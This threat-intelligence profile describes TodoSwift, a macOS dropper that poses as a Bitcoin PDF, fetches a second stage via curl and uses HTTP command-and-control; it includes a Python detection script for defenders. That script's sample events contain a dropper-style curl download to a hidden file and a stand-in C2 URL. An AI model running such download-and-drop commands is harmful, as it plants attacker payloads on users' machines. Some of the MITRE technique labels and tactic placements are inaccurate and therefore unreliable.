TodoSwift (Dropper) – Malware

February 13, 2025
TodoSwift

  • Type of Malware: Dropper
  • Country of Origin: North Korea
  • Date of Initial Activity: 2024
  • Associated Groups: BlueNoroff
  • Motivation: Financial Gain
  • Attack Vectors: Phishing
  • Targeted Systems: macOS

Overview

TodoSwift is a macOS dropper that was identified on August 21, 2024 and quickly drew the attention of the security community because of its deceptive delivery and the risk it poses to macOS users. It masquerades as an innocuous PDF about Bitcoin pricing; this social engineering lure leads victims to run the malware themselves, unaware of what the file actually contains. Behind the harmless appearance is a full application written in Swift with a SwiftUI interface, Apple's own language and UI framework for macOS, so the dropper looks and behaves like an ordinary native app rather than a script or a document.

Targets

Individuals

How they operate

TodoSwift's first contact with a victim is a social engineering lure: it presents itself as an innocent PDF about Bitcoin pricing and is distributed through phishing emails or malicious websites that trick users into downloading it. What looks like a harmless document is in fact a dropper, a type of malware whose job is to start the infection by deploying additional malicious payloads onto the victim's machine. The operator hosts the dropper on Google Drive URLs, exploiting the trust users place in a reputable cloud storage service; a download from such a service raises little suspicion and is less likely to be blocked or flagged.

Once downloaded and opened, TodoSwift runs as a native application built with Swift and SwiftUI, Apple's language and UI framework for macOS and iOS development. Its first action is to use NSTask (exposed to Swift as Process), the Apple API for launching external processes, to run curl, the standard command-line download tool on Unix-based systems. These curl invocations retrieve the second-stage payload from servers controlled by the attacker; the payload can then be executed on the system, completing the infection cycle and potentially giving the attacker full control of the compromised device.

The malware uses command and control (C2) communication to maintain a persistent link between the compromised device and the attacker's servers. TodoSwift's C2 traffic typically rides on HTTP, which is harder to single out because web traffic is usually treated as benign. The dropper also reads command-line arguments passed at launch, which carry embedded C2 URLs pointing to remote servers where further payloads or instructions are hosted.

Once connected, the compromised system can download more sophisticated malware, upload sensitive information, or execute further commands, all under the attacker's control. The choice of NSTask and curl is a deliberate design decision: both are ordinary system components, so the dropper's activity blends in with routine operations and evades traditional security mechanisms. The reliance on macOS system APIs and on trusted cloud services for delivery is what makes the malware hard to spot in its early stages, and its use of standard web protocols for server communication further complicates detection by tools that do not flag routine web traffic as suspicious.

In summary, TodoSwift is a well-crafted dropper that capitalizes on user trust, macOS system capabilities, and modern web protocols. By masquerading as a legitimate PDF, using cloud storage for delivery, and executing commands through system APIs, it presents a significant threat to macOS users. Its success hinges on staying stealthy during the initial infection phase, which ultimately lets the attackers steal data or deploy further malicious software without detection. The growing sophistication of such threats underscores the need for awareness of social engineering tactics and for robust endpoint protection.
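The behaviour chain described above is something process telemetry can catch: a native app bundle spawning curl to pull a file from a cloud-storage host and write it to disk, plus URLs sitting in the app's own launch arguments. The following is an added illustration of that detection logic, not code from the original article or from any vendor report; the event field names and the sample events are constructed assumptions standing in for what an EDR or the macOS Endpoint Security framework would report.

```python
import re
from urllib.parse import urlparse

# Hosts the article names as the delivery mechanism; extend with your own list.
CLOUD_STORAGE_HOSTS = {"drive.google.com", "docs.google.com"}
URL_RE = re.compile(r"https?://[^\s'\"]+")

def urls_in(argv):
    """All http(s) URLs found anywhere in an argument vector."""
    return [u for arg in argv for u in URL_RE.findall(arg)]

def analyse_event(ev):
    """Return (rule_name, detail) findings for one process-execution event.
    ev keys (assumed field names): pid, parent, parent_argv, exe, argv."""
    findings = []
    parent_is_app = ".app/Contents/MacOS/" in ev["parent"]
    exe_name = ev["exe"].rsplit("/", 1)[-1]
    # Rule 1: a GUI app bundle (via NSTask) spawns curl pulling from cloud storage
    if parent_is_app and exe_name == "curl":
        for u in urls_in(ev["argv"]):
            if (urlparse(u).hostname or "").lower() in CLOUD_STORAGE_HOSTS:
                findings.append(("app_curl_cloud_fetch", u))
        # curl told to write its download to disk is the dropper shape
        if any(a in ("-o", "--output") for a in ev["argv"]):
            findings.append(("app_curl_writes_file", " ".join(ev["argv"])))
    # Rule 2: the app itself was launched with URLs in its arguments (embedded C2)
    if parent_is_app:
        for u in urls_in(ev.get("parent_argv", [])):
            findings.append(("app_launch_arg_url", u))
    return findings

def scan(events):
    """Map pid -> findings for every event that triggered at least one rule."""
    out = {}
    for ev in events:
        hits = analyse_event(ev)
        if hits:
            out[ev["pid"]] = hits
    return out

# Constructed sample telemetry (not real indicators): one dropper-like chain, one benign.
SAMPLE_EVENTS = [
    {"pid": 501, "parent": "/Users/u/Downloads/BitcoinPrice.app/Contents/MacOS/BitcoinPrice",
     "parent_argv": ["BitcoinPrice", "https://c2.example.invalid/stage2"],
     "exe": "/usr/bin/curl",
     "argv": ["curl", "-sL", "-o", "/tmp/.update", "https://drive.google.com/uc?id=EXAMPLE"]},
    {"pid": 502, "parent": "/bin/zsh", "parent_argv": ["zsh"],
     "exe": "/usr/bin/curl", "argv": ["curl", "https://example.com/"]},
]
```

Calling `scan(SAMPLE_EVENTS)` flags only pid 501, with all three rules firing; the interactive curl from a shell produces no finding.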

MITRE Tactics and Techniques

1. Initial Access
  • Phishing (T1566): Although TodoSwift masquerades as a legitimate PDF file, it relies on a social engineering tactic to deceive the user into downloading and executing the malware. The fake PDF is likely distributed via email or other deceptive methods, which is common in phishing attacks.
  • Drive-by Compromise (T1189): The malware is hosted on Google Drive, which is a trusted cloud storage service. Attackers often use reputable services to disguise the origin of the malicious content and trick users into downloading it.
2. Execution
  • User Execution (T1203): Once the user opens the disguised PDF, the malware is executed. This is the key step where the user unknowingly runs the dropper, starting the attack sequence.
  • Command and Scripting Interpreter (T1059): TodoSwift uses NSTask to execute system commands via the curl command-line tool. This technique is often used to download or retrieve malicious payloads from a remote server.
3. Persistence
  • Masquerading (T1036): TodoSwift masquerades as a legitimate PDF document to evade detection. By using a trusted file type and naming conventions that appear innocuous, it maintains persistence on the system by remaining undetected for as long as possible.
4. Command and Control
  • Application Layer Protocol (T1071): TodoSwift communicates with a command-and-control (C2) server using web protocols like HTTP. It uses cloud-based storage URLs (such as Google Drive) and C2 URLs embedded in the launch arguments to exfiltrate data or receive further instructions from the attacker.
5. Exfiltration
  • Exfiltration Over Command and Control Channel (T1041): After retrieving the second-stage payload, the malware is capable of communicating with remote servers over the C2 channel. This can include sending data from the compromised system to the attackers.
6. Impact
  • Data Manipulation (T1565): If the second-stage payload allows the attackers to modify, steal, or manipulate system data (including files, credentials, or system settings), this falls under the impact category.
References:
  • TodoSwift Disguises Malware Download Behind Bitcoin PDF
  • TodoSwift: New macOS threat masquerading as a PDF
Tags: Bitcoin, BlueNoroff, Droppers, Google, MacOS, Malware, North Korea, Phishing, TodoSwift